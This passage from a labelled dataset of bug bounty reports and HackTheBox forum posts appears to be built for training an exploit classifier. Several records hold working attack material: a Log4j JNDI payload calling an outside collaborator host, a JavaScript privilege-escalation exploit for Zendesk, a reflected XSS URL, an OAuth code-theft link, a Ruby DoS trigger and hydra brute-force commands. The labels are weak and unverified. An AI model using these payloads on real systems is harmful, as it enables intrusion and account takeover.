\"oldpass\" value can empty to bypass:))\n### The \"idUsuario\" value requirement can guess!!!\n\n### impact:\nAccount Takeover", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d1dc00e5ed4932dc8550", "text": "[Code Injection] Log4j Java RCE in [beta.dev.adobeconnect.com]\n\nHello Security Team,\n\n###Summary\nLog4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\nAs per Apache's Log4j security guide: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.\n\n###Platform Affected: [website]\nhttps://beta.dev.adobeconnect.com\n\n###Proof of concept:\n\n* Request:\n\n```javascript\nGET /?x=${jndi:ldap://${hostName}.dq7iqbvjiufrlpt5mri9dvpb42atyi.burpcollaborator.net/a} HTTP/1.1\nHost: beta.dev.adobeconnect.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: BREEZESESSION=breezdiekv3smcc2xdw3u; BreezeCCookie=conn-BZTI-9BM9-2M7O-HWCG-XCF2-KDFT-KN7O-Y78S\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\n```\n\n* Response:\n\n{F1569913}\n\n## Impact\n\nLogging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.\n\nRegards,\nSheikh rishad", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d2e035b308e1cdbec441", "text": "[Business Logic Errors] CVE-2022-27782: TLS and SSH connection too eager reuse\n\n## Summary:\nCurl fails to consider some security related options when reusing TLS connections. For example:\n\n# TLS\nCURLOPT_SSL_OPTIONS\nCURLOPT_PROXY_SSL_OPTIONS\nCURLOPT_CRLFILE\nCURLOPT_PROXY_CRLFILE\nCURLOPT_TLSAUTH_TYPE\nCURLOPT_TLSAUTH_USERNAME\nCURLOPT_TLSAUTH_PASSWORD\nCURLOPT_PROXY_TLSAUTH_TYPE\nCURLOPT_PROXY_TLSAUTH_USERNAME\nCURLOPT_PROXY_TLSAUTH_PASSWORD\n\nAs a result for example TLS connection with lower security (`CURLSSLOPT_ALLOW_BEAST`,` CURLSSLOPT_NO_REVOKE`) connection reused when it should no longer be. Also connection that has been authenticated perviously with `CURLSSLOPT_AUTO_CLIENT_CERT` might be reused for connections that should not be.\n\n# SSH\nCURLOPT_SSH_PUBLIC_KEYFILE\nCURLOPT_SSH_PRIVATE_KEYFILE\n\nIf the attacker knows the vulnerable application used SSH key authentication towards specific host with certain username and protocol they can then perform actions to the same host afterwards and abuse the connection reuse.\n\n## Impact\n\n- Wrong identity (client certificate) or TLS security options being used for subsequent connections to the same hosts.\n- Previously authenticated SSH sessions (SCP/SFTP) reuse.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-27782"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8c78fddac96cce72e5a3", "text": "[Uncontrolled Resource Consumption] DoS in bigdecimal's sqrt function due to miscalculation of loop iterations\n\n# Vulnerability\n__Affected Product__: `bigdecimal` extension in https://github.com/ruby/ruby\n__Affected Versions__: At least version 3.2.2, I didn't test any previous versions\n\nThe current implementation of `BigDecimal#sqrt` in `ext/bigdecimal/bigdecimal.c` erroneously checks its parameter\nand allows users of the function to control how long it will run. This may lead to\na DoS if the parameter to the function can be controlled by an attacker.\n\nThe implementation of `BigDecimal#sqrt` involves a loop that iteratively calculates\nthe value of the square root:\n```c\ndo {\n y->MaxPrec *= 2;\n if (y->MaxPrec > y_prec) y->MaxPrec = y_prec;\n f->MaxPrec = y->MaxPrec;\n VpDivd(f, r, x, y); /* f = x/y */\n VpAddSub(r, f, y, -1); /* r = f - y */\n VpMult(f, VpConstPt5, r); /* f = 0.5*r */\n if (VpIsZero(f))\n goto converge;\n VpAddSub(r, f, y, 1); /* r = y + f */\n VpAsgn(y, r, 1); /* y = r */\n} while (++nr < n);\n```\nThe number of iterations is determined by the number `n`, which is derived from the\nparameter of the `sqrt` function.\nThe application tries to impose a limit on the number of iterations, as can be seen\nin line 4659:\n```c\n#define maxnr 100UL /* Maximum iterations for calculating sqrt. */\n```\nHowever, the calculation of `n` is erroneous and uses `maxnr` as a _lower_ bound and not\nan upper bound for `n` as can be seen in line 7220:\n```c\nif (n < (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n```\nThis may cause the program to have more iterations than originally intended.\n\n# Proof of Concept\nThe following ruby program iterates 10000 times instead of 100 and takes longer than 10 min to complete on my machine:\n```rb\nrequire 'bigdecimal'\nBigDecimal(\"6E19\").sqrt(10000)\n```\nFurthermore, it can be observed the ruby interpreter stalls completely. The program has to be killed with SIGKILL.\n\n# Solution\nThe following patch resolves the error:\n```diff\ndiff --git a/ext/bigdecimal/bigdecimal.c b/ext/bigdecimal/bigdecimal.c\nindex 07c2bcf0b5..31e5574574 100644\n--- a/ext/bigdecimal/bigdecimal.c\n+++ b/ext/bigdecimal/bigdecimal.c\n@@ -7217,7 +7217,7 @@ VpSqrt(Real *y, Real *x)\n y->MaxPrec = Min((size_t)n , y_prec);\n f->MaxPrec = y->MaxPrec + 1;\n n = (SIGNED_VALUE)(y_prec * BASE_FIG);\n- if (n < (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n+ if (n > (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n\n /*\n * Perform: y_{n+1} = (y_n - x/y_n) / 2\n```\nThis change maintains the correctness of the implementation. \nI have checked this against the test suite from https://github.com/ruby/bigdecimal and all the tests still pass.\n\n## Impact\n\nIf an attacker can control the parameter to `BigDecimal#sqrt` he/she can cause a ruby program to hang\nfor a long time.\nFurtermore, since the loop is inside of a function of an extension it blocks the interpreter / execution engine\nas a whole hindering the delivery of events or signals.\nAs seen above, a ruby program that is caught up in such a loop can only be interrupted by a SIGKILL signal.\nSince the bug is\n1. Easy to trigger if the necessary conditions are met\n2. Has a huge effect for relatively small input values\n\nI chose the severity medium.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c31f27813692fb79e58f", "text": "[Violation of Secure Design Principles] Found Origin IP's Lead To Access ████\n\nDiscovered that the ██████ site exposed its Non-Cloudflare IP which could allow bypassing of anti-DDoS mechanisms.\nYour origin servers are not blocking access from non-Cloudflare servers.This way crawlers can find your origin servers' IPs by checking random IPs until they found your origin server(s).\nWhat makes this especially easy are tools like shodan.io(which can find your origin servers).\n\n## Impact\n\nThis attack vector can be extremely bad because with the IP found out an attacker could attack the servers by DDoS or other attacks without being stopped by CloudFlare.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nVisit these link:\nhttps://www.shodan.io/search?query=hostname%3A████+200\n\nIP:\n-███\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c3a01f27a4bae876d9c", "text": "[Improper Access Control - Generic] Talk Android broadcast receiver is not protected by broadcastPermission allowing malicious apps to communicate\n\n## Summary:\nCall to registerReceiver misses the broadcastPermission argument - no permissions will be checked for the broadcaster, which allows a malicious application to communicate with the broadcast receiver.\n\n## Supporting Material/References:\n\n * Screenshot Snyk report\n * references to fixes in other repos\n\nhttps://github.com/alvinhkh/buseta/commit/6b791de8e3622ef157b065f9c82fcfd5a0e2302a?diff=split#diff-a75527f97c6732197964c1dbf30fd385L66\n\nhttps://github.com/serso/android-messengerpp/commit/1528fdc2d3561bab192dfde9a84a737a26a19fce?diff=split#diff-7ff52f2abe79bd0a68d54916fe71aef2L92\n\nhttps://github.com/irccloud/android/commit/857287d6d9da443b0ff667505d5bf4a383922784?diff=split#diff-f06bf5e27b9130d322139330f7f31997L40\n\n## Impact\n\nUnsure, potentially interfere with call starts and audio/bluetooth setup", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "72e750a26781a7f7e964", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\ncurl supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.\n\nThe use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.\n\n## Impact\n\nDenial of service", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32206"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b5c27b13b58a69e99fdf", "text": "[Unknown] [python]: Add some dangerous sinks for paramiko ssh clients\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "752a99b6493f5bad56be", "text": "[Business Logic Errors] CVE-2022-27778: curl removes wrong file on error\n\n## Summary:\nCurl command has a logic flaw that results in removal of a wrong file when combining `--no-clobber` and `--remove-on-error` if the target file name exists and an error occurs.\n\n## Steps To Reproduce:\n 1. `echo \"important file\" > foo`\n 2. `echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 666\\r\\n\\r\\nHello\\n\" | nc -l -p 9999`\n 3. `curl -m 3 --no-clobber --remove-on-error --output foo http://testserver.tld:9999/`\n 4. `ls -l foo*`\n 5. `cat foo.1`\n\n`-m 3` is used here to simulate a denial of service of the connection performed by the attacker.\n\nThe bug appears to happen because the remote-on-error `unlink` is called without considering the no-clobber generated file name:\n- no-clobber name generation; https://github.com/curl/curl/blob/3fd1d8df3a2497078d580f43c17311e6f58186a1/src/tool_cb_wrt.c#L88\n- remove-on-error unlink: https://github.com/curl/curl/blob/f7f26077bc563375becdb2adbcd49eb9f28590f9/src/tool_operate.c#L598\n\n## Impact\n\nRemoval of a file that was supposed not to be overwritten (data loss). Incomplete file left of disk when it should have been removed. This can lead to potential loss of integrity or availability.\n\nFor this attack to work the attacker of course would need to know a scenario where the victim is performing curl operation with `--no-clobber` `--remove-on-error` options.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-27778"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e53ea77a4bde1b9c3d51", "text": "[Improper Authorization] Stealing Users OAuth authorization code via redirect_uri\n\n## Summary:\nPath traversal in OAuth `redirect_uri` which can lead to users authorization code being leaked to any malicious user.\n\nThe following authorization code flow request is generated at booth login.\n```\nhttps://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149\n```\n\nPath traversal vulnerability in this `redirect_uri` parameter allows the attacker to direct the user to the product page created by the attacker.\n```\nredirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924\n```\n-> redirected to https://booth.pm/ja/items/4503924\n\nIf the attacker had Google Analytics enabled, the query string could be exposed when the victim is redirected to the product page, so the unused authorization code is leaked.\n\n## Steps To Reproduce:\n\n 1. The attacker makes his shop public. Register his products and set up his Google Analytics tracking ID.\n 2. Have the victim click on the following link; the value of the state parameter can be anything.\n```\nhttps://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/[attacker's product id]&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149\n```\n\n 3. When the victim clicks on the above link and proceeds with the login process, he is redirected to the attacker's product page.\n\n 4. The attacker can steal victims' authorizaiton code from Google Analytics real-time reports.\n\n## Impact\n\nDue to path traversal in `redirect_uri` parameter in OAuth flow, its possible to redirect authenticated users to attacker's product page with their OAuth credentials from which its possible to takeover their account.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d3b25ef60734e75be9c9", "text": "[Improper Authentication - Generic] Unauthorized access to GovSlack\n\nHead to slack.com (I use firefox), login as a user that hasn't used slack, create a workspace, copy the payload as fetch. In my case:\n\n```\nawait fetch(\"https://slack.com/api/signup.createTeam?_x_id=noversion-1667355054.372\", {\n \"credentials\": \"include\",\n \"headers\": {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------34111059701841183173198228768\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\"\n },\n \"referrer\": \"https://slack.com/get-started\",\n \"body\": \"-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"email_misc\\\"\\r\\n\\r\\ntrue\\r\\n-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"tz\\\"\\r\\n\\r\\nAmerica/Los_Angeles\\r\\n-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"locale\\\"\\r\\n\\r\\nen-US\\r\\n-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"last_tos_acknowledged\\\"\\r\\n\\r\\ntos_mar2018\\r\\n-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"login\\\"\\r\\n\\r\\ntrue\\r\\n-----------------------------34111059701841183173198228768\\r\\nContent-Disposition: form-data; name=\\\"in_setup_experiment\\\"\\r\\n\\r\\ntrue\\r\\n-----------------------------34111059701841183173198228768--\\r\\n\",\n \"method\": \"POST\",\n \"mode\": \"cors\"\n});\n```\n\nLogin to slack-gov.com, where the option to create a workspace for new users is disabled. Send this same fetch request, replacing slack.com with slack-gov.com. In my case, the workspace created is viomck.slack-gov.com.\n\n## Impact\n\nUnauthorized access to GovSlack.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f8b5589b6b428183aeff", "text": "f there is still an opening, I’d like a chance to join. I have been doing most of this stuff solo, would love to get more involved. DM me if this is still available.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "badbdbc1e4ba1b3ca61b", "text": "[Privilege Escalation] subdomain takeover at odoo-staging.exness.io\n\n**Domain:**\n>https://odoo-staging.exness.io\n\n**PoC**\n>https://odoo-staging.exness.io\n\n**Cname:**\n```\n$ host odoo-staging.exness.io\nodoo-staging.exness.io is an alias for exness-stg.odoo.com.\nexness-stg.odoo.com has address 141.95.172.222\nexness-stg.odoo.com mail is handled by 10 eu123a.odoo.com.\n```\n\n## Impact\n\nScam, phishing", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1f092c1b684e1fcba212", "text": "here is the solution if none of the advice did not work. Make sure to delete “salt” in the #Variables tab. We will set the salt in the loop. Variables var=“9M” hash=“VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K” Base64 Encoding Example: $ echo “Some Text” | base64 ← For-Loop here for ((i = 0 ; i < 28 ; i++)); do echo “Try number $i” var=$(echo $var | base64) echo $var | wc -c salt=$(echo $var | wc -c) done", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d23ebcd156b74253d92d", "text": "Hello mates, I’ve just finish the “ Skills Assessment - Service Login ” from the Login Brute Forcing module. As advice for the last exercise: Read carefully what is written in the question: As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. As you already know the employee name ** Create a custom username and password list Don’t forget to use sed to remove passwords: ** Shorter Than 8 ** With No Special Chars ** With No Numbers Use the correct syntax: ** hydra -L user.txt -P password.txt -u -f ssh://SERVER_IP:PORT -t 4 When you’ve got access to the ssh, then try to brute force the second user that can be found at /home/username hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4 And finally when you brute force the password, you can login with ssh user@IPADDRESS -p PORT and read the flag.txt from the home directory of the user.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6631e24cfee9aa0db866", "text": "[Improper Restriction of Authentication Attempts] Brute force of a current password on a disable 2fa leads to guess password and disable 2fa.\n\nSummary:\nThis Attack happen when victim login in other device and forget to logout ,Then attacker can enable 2-factor authentication by brute fore the password of victim endpoints.\n\n## Steps To Reproduce:\n(1)Login in https://dashboard.omise.co/signin\n(2) Click on your username\n(3)Navigate to Two-factor authentication --> Disable 2FA\n(4)add random password in Please confirm your identity to register a new Two-Factor Authenticator\n(5)Capture the request and send it for fuzz\n\n\nPOC\nIn screenshot you can see change in length of content when request encounter right password.\n\n## Impact\n\nAttacker can disable 2fa and brute force currrent password.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b809462542da2d18df6d", "text": "[Uncontrolled Resource Consumption] No password length restriction in reset password endpoint\n\nHi, \n\n##Summary:\nThere is no password length restriction in reset password endpoint at https://efss.qloud.my/index.php/login when resetting for new password.\n\n\n##Steps To Reproduce:\n1. Visit https://nextcloud.com/sign-up/ and Sign up.\n\n2. Logout and reset your password.\n\n 3.Go to your email and click on reset password link.\n4.Enter 150 characters or more as a password and confirm the characters.\n5.You will successfully logged in.\n\n## Impact\n\nAttacker can do denial of service to your server since there is no restriction in the length of password.\nExample when he enter like 2500 character, your server will crash for some time \nBelow Image is the impact of entering 2500 characters.\n\n##Mitigation :\n\nRestrict user to use less than 40 character as a password, while the restriction should be both on back-end and front-end (with javascript ).\n\n##THANK YOU", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "07d6d7c7035602f5282c", "text": "[Unknown] [Python] Unsafe unpacking using shutil.unpack_archive() query and tests\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "44a77ce8e0cfb4e26c0f", "text": "[Information Exposure Through an Error Message] Tor Project - Full Path Disclosure\n\nHi there,\n\nWhile you are primarily interested in the network/browser issues, I would like to report a web bug I discovered and thought the best place to do that would be here.\n\n# Vulnerability\n\nType: Full Path Disclosure [CWE-209]\nAffected endpoint: https://explorer.ooni.torproject.org\nExample: https://explorer.ooni.torproject.org//x\n\n# Details\nVulnerability details as follows.\n\n## Impact\nThis security vulnerability could potentially allow a malicious hacker to map an attack against internal systems. For example, if this were to be chained with another vulnerability such as path traversal; it may lead to compromise of internal systems.\n\n## Mitigation\nTypically these sort of errors occur from incorrect data types, in this case it seems like it is just a simple 404 page which is however leaking too much information to the user. \n\nA best practice method is to log these type of errors to a local text file, while showing the user a friendly 404 message. This is often achieved by disabling error reporting on the application side.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "91206517d90e859a8a6b", "text": "[Security Through Obscurity] Subdomain takeover of █████████\n\nI have found a subdomain of `███████` to be vulnerable to takeovers via a CNAME to unclaimed domain. I have claimed this domain and redirected them to a blank page to prevent a bad actor from doing so in the meantime, and hosted a POC file at obscure URLs. These are the following domains I discovered and the outdated endpoints on Azure to which they point:\n\n█████ --> ████\n\n...and the proof-of-concept file is at the following location:\n\nhttps://████████/proof.e7437329-ab61-4f22-a049-df5b3685313a.txt\n\nI have not hosted any other file nor attempted any other vector of attack.\n\n## Impact\n\nYou're probably familiar with takeovers like this by now, but through this vulnerability, it would be possible for an attacker to obtain cookies and other sensitive information from your users via phishing, cookie hijacking, or XSS.\n\nMore info on possible attack vectors can be found at MDN: https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nTo confirm the issue visit:\n\nhttps://████████/proof.e7437329-ab61-4f22-a049-df5b3685313a.txt\n\n## Suggested Mitigation/Remediation Actions\nRemove CNAME of █████", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ecb1c35f6fe74541d831", "text": "[Privilege Escalation] Privilege escalation - Support-Contributor to Support and Product Admin via `/api/v2/██████` . No ADMIN PRIVILEGE required.\n\nHello team, I am reporting another privilege escalation issue where a lowest privilege member(Support-Contributor) to full Support and Product administrator. Tested in Zendesk Enterprise(Sponsored) and Trial Account.\n\nFrom my past reports I was able to find privilege escalation issues on the endpoint `/api/███` . The difference is, to perform a privilege escalation on the said endpoint, there should be at least one Product Admin privilege on the actor's account but this report does not require any Admin privilege(just the lowest privilege alone).\n\n## Summary:\nThe [Contributor Role](https://support.zendesk.com/hc/en-us/articles/4408832171034-About-team-member-product-roles-and-access) is the lowest Support role in Zendesk. In the UI alone, as a contributor, the accessible pages and and endpoints are very limited. With this role, the members page is not even accessible or restricted. With these restrictions, escalating your own role seem to be impossible.\n\n##Improper Access Control to Privilege Escalation\nVulnerable Endpoint: `PUT /api███ HTTP/2`\n\nThe `/api████████` endpoint is used for API integration to █████. █████████ . However, the said endpoint does not validate the privilege of the user who is sending a request. With this bug, a member with even just the lowest privilege(Contributor) is able to escalate any members' privilege to `FULL ADMINISTRATOR` including its own privilege.\n\n## Browsers Verified In:\nLatest version of Chrome and Firefox\n\n##Exploit\n```javascript\n//Exploit\n//get csrf token and id\nvar xhttp = new XMLHttpRequest();\nxhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n var profile = JSON.parse(this.responseText);\n var csrf = profile.user.authenticity_token;\n\t\tvar id = profile.user.id;\n escalate(id, csrf);\n }\n};\n\nxhttp.open(\"GET\", \"https://\" + document.domain + \"/api/v2/users/me.json\");\nxhttp.send();\n\n\n//privilege escalation function\nfunction escalate(id, csrf) {\n var xhttp = new XMLHttpRequest();\n xhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n console.log(this.responseText);\n }\n };\n\n xhttp.open(\"PUT\", \"https://\" + document.domain + \"/api██████;\n xhttp.setRequestHeader(\"X-Csrf-Token\", csrf);\n xhttp.setRequestHeader(\"Content-Type\", \"application/json\");\n xhttp.send(JSON.stringify(███));\n}\n```\n\n## Steps To Reproduce:\n`On owner/admin account`\n1. Go to https://.zendesk.com/admin/people/team/members/new\n2. Provide the name and email of the agent\n3. Click Next\n4. Set the Support role to CONTRIBUTOR\n5. Go to https://.zendesk.com/admin/people/team/members\n6. Click the profile on the invited user\n7. Now set the roles to Support-Contributor only and `DISABLE` any product access(just to prove that no other privilege is required).\n\n`On invited user`\n8. You will receive an email. Click it to accept the invitation\n9. Login the invited account\n10. Execute the exploit to escalate your privileges.\n\n## Demo And PoC\nOn Enterprise account\n███\nOn Trial account\n███\n\n## Impact\n\nPrivilege escalation - Support-Contributor to Support and Product Admin.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "42f80635802b3f4074a7", "text": "[Insufficient Session Expiration] Can use the Reddit android app as usual even though revoking the access of it from reddit.com\n\n## Summary:\nHi Team,\n\nFor the last 4 days, I kept testing reddit web. That time, I revoked app access from the old.reddit.com and i checked my app and as expected i was not able to use the account in my app. \n\nAfter 2 days I was checking the chat invites feature on the web and after some time I turned on the internet on my mobile and got a Reddit \"invitation accept\" notification. I clicked on that and I was surprised that I was able to use the previously revoked user account again in the Reddit app.\n\nAfter I tried to reproduce the scenario again. I thought the revoked account get access again after clicking on the app \"chat invite\" notification. \n- I again revoked the app access from the old.reddit.com\n- I sent a chat invitation link to another test account and replied with the test account so that I get a \"chat accept\" notification in the mobile\n- After several tries from several test accounts, Finally, I received the \"chat accept\" invitation, only one time on the mobile (Note: this is also an issue)\n- I clicked on the notification and I was not able to access anything in the app (it was showing some error)\n- I tried to reproduce the issue again, I don't know the reason But this time I was not able to view the chat invite links from any accounts. (it was showing some error)\n- It took my whole day and I stopped testing.\n\nThe next day again I got a post notification on my mobile. I clicked on that and again I see that the app was working as usual with a previous logged-in user!!!\n\nFinally, I came to the conclusion that whenever we revoke the app access, it works fine. But if you check the app approximately after 20+ hours you can reuse the previously logged-in account again.\n\n## Steps To Reproduce:\n 1. log in to your account from both the android mobile app and from the web(reddit.com or old.reddit.com)\n 2. On the Reddit web go to https://www.reddit.com/account-activity \n 3. Navigate to the \"Apps you have authorized\" section\n 4. Find \"Reddit on Android\" click the revoke access and confirm\n 5. Now open the Reddit app where you have logged in step 1\n 6. You are no more able to access any info about the user and it will show errors like \"Let's try that again\" or \"uh oh something went wrong but we're not sure what\"\n 7. Open the app approximately after 20+ hours and see that you can reuse the previously logged-in account without any issue.\n\n## Supporting Material/References:\nI see that I got the latest app update and trying to reproduce the issue again on the latest version i.e 2022.25.1 I will update you on it again. I assume previously my Reddit app version was 2022.25.0 or 2022.24.1\nDevice and version info{F1814768}\nThe account/username used for testing is: sateeshn_1\n\n## Impact\n\nUnauthorized access to account even though revoking the access.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9101e24bf6d071d17adc", "text": "[Cross-site Scripting (XSS) - Reflected] [https://app.recordedfuture.com] - Reflected XSS via username parameter\n\n## Steps To Reproduce:\n\n```\n1-> Visit https://app.recordedfuture.com/live/login/?reset=x&username=xss%22%3E%3Cimg+src=x+onerror=alert(document.domain)%3E\n```\n\n## Impact\n\nAn attacker could be able to Inject Malicious Javascript to compromise users", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "88c4a93b0739c64ab301", "text": "[Information Disclosure] An attacker can can view any hacker email via /SaveCollaboratorsMutation operation name\n\n**Summary:**\n\nAn attacker can view any attacker or normal user email after send invitation via dummy report , disclose their private email.\n \n**Description:**\n\n### Steps To Reproduce\n\n1 - Create a dummy report and send it\n2 - Add a hacker that you want to disclose his email , Max is only 2 invites per report\n3 - send the invite after sending the invite the hacker will be pending status until accept the report .\n4- Go the pen on the right for adding more collaborator and click on the pen and capture traffic , you will see the user email in first request,\neven that the user not accept the invitation yet \n\nHTTP Request : \n```\nPOST /graphql HTTP/2\nHost: 